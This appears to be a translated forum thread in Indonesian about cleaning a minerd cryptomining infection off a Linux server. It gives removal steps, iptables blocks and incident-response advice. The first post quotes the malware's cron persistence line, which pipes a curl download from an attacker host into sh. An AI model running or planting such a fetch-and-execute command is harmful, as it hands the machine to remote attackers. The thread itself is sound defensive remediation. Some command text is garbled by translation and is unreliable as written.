Saya menemukan solusi untuk menghapus minerd . Saya cukup beruntung menemukan skrip aktual yang digunakan untuk menginfeksi server saya. Yang harus saya lakukan hanyalah menghapus elemen yang ditempatkan oleh skrip ini -
- Atas saran monkeyoto, saya memblokir semua komunikasi dengan server mining pool -
iptables -A INPUT -s xmr.crypto-pool.fr -j DROPdaniptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP. - Menghapus cron
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | shdari/var/spool/cron/rootdan/var/spool/cron/crontabs/root. - Menghapus direktori
/opt/yam. - Membuang
/root/.ssh/KHK75NEOiq. - Menghapus file
/opt/minerddan/opt/KHK75NEOiq33. - Menghentikan proses penambang -
pkill minerd. - Menghentikan
lady-service lady stop.
Saya menjalankan ps -eo pcpu,args --sort=-%cpu | head , top -bn2 |sed -n '7,25'p dan ps aux | grep minerd setelah itu dan malware tidak terlihat.
Saya masih perlu mencari tahu bagaimana ia mendapatkan akses ke sistem, tetapi saya dapat menonaktifkannya dengan cara ini.
Tujuan pertama Anda adalah (jika Anda tidak ingin menginstal ulang) adalah untuk menentukan bagaimana hal itu berhasil sampai ke sana. Jika penyerang licik, mereka akan menjalankan "timestomp" untuk mengubah tanggal biner. Anda meminimalkan SSH tidak banyak membantu jika Anda menjalankan versi Wordpress yang rentan, atau Joomla, atau sesuatu yang berbeda. Misalnya, ada exploit Nagios yang digunakan seseorang untuk menjalankan minerd. Jadi tujuannya... "Tentukan apa yang berjalan, mengapa berjalan, dan apakah rentan?"
Kedua, Anda ingin memblokir semua komunikasi ke dan dari server mining-pool:
iptables -A INPUT -S xmr.crypto-pool.fr -j DROP
Jadi bagaimana Anda menentukan apa yang dimodifikasi/diubah/rentan? Anda perlu memahami sistem Anda. Apa fungsinya, mengapa melakukannya, dan siapa yang membutuhkan akses ke sana. Saya akan mencari crontab saya untuk melihat apa, jika ada sesuatu yang dimulai. Anda dapat menjalankan:service --status-all untuk melihat layanan apa yang sedang berjalan/dimulai, dan menyelidikinya. /opt/minerd tampaknya adalah sebuah file, checksum file itu dan Anda dapat membuat skrip untuk mencari apa pun yang memanggil file itu, atau file apa pun yang cocok, misalnya:find / | xargs grep -i minerd atau find / | xargs grep -i CHECKSUM_of_MINERD (Perlu diingat bahwa ini adalah cara pencarian yang brutal di dalam file).
Ketiga, periksa log Anda. Jika Anda menjalankan server web, saya akan mulai dengan log kesalahan (error_logs) dan mencari beberapa 403 dan 404 dari alamat diikuti dengan koneksi yang berhasil di access_log. Periksa jalur yang diterima (mis. 200:/var/www/nagios_or_something_vulnerable/config.php) dan lihat ke dalam direktori. Ada banyak cara untuk menemukan informasi ini, tetapi tidak seorang pun di sini yang dapat memberi Anda jawaban lengkap karena kami hanya dapat menyimpulkan informasi berdasarkan jumlah informasi yang Anda poskan.
"Saya punya file bernama minerd mulai!" Gali untuk file itu. (find /|xargs grep -i minerd ). "Ia menggunakan tali aneh ini!" (find / |xargs grep -i 47TS1NQvebb3Feq ). "Itu membuat koneksi ke port 8080!" (lsof -i | awk '/8080|http-alt/{print $1"\t"$2"\t"$8"\t"$9}' ). "Ini terhubung ke alamat ini!" (lsof -i | grep xmr.crypto ... Sekarang Anda memiliki garis dasar tentang hal-hal yang dapat Anda lakukan.
Masalahnya adalah bahwa penambang mungkin adalah muatan dari beberapa malware (lainnya), jadi Anda tidak dapat benar-benar mengetahui apa lagi yang telah dikompromikan pada sistem. Mungkin tidak ada hal lain yang ada di sistem, dan Anda baru saja terinfeksi ulang setiap kali Anda membunuh penambang.
Alternatifnya, ada beberapa proses manajemen/pelepas yang telah membuka pintu belakang ke server Anda.
Taruhan teraman adalah membuat ulang server. Tetapi jika Anda ingin memindainya, Anda bisa mendapatkan Sophos Anti-Virus gratis dari https://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-linux.aspx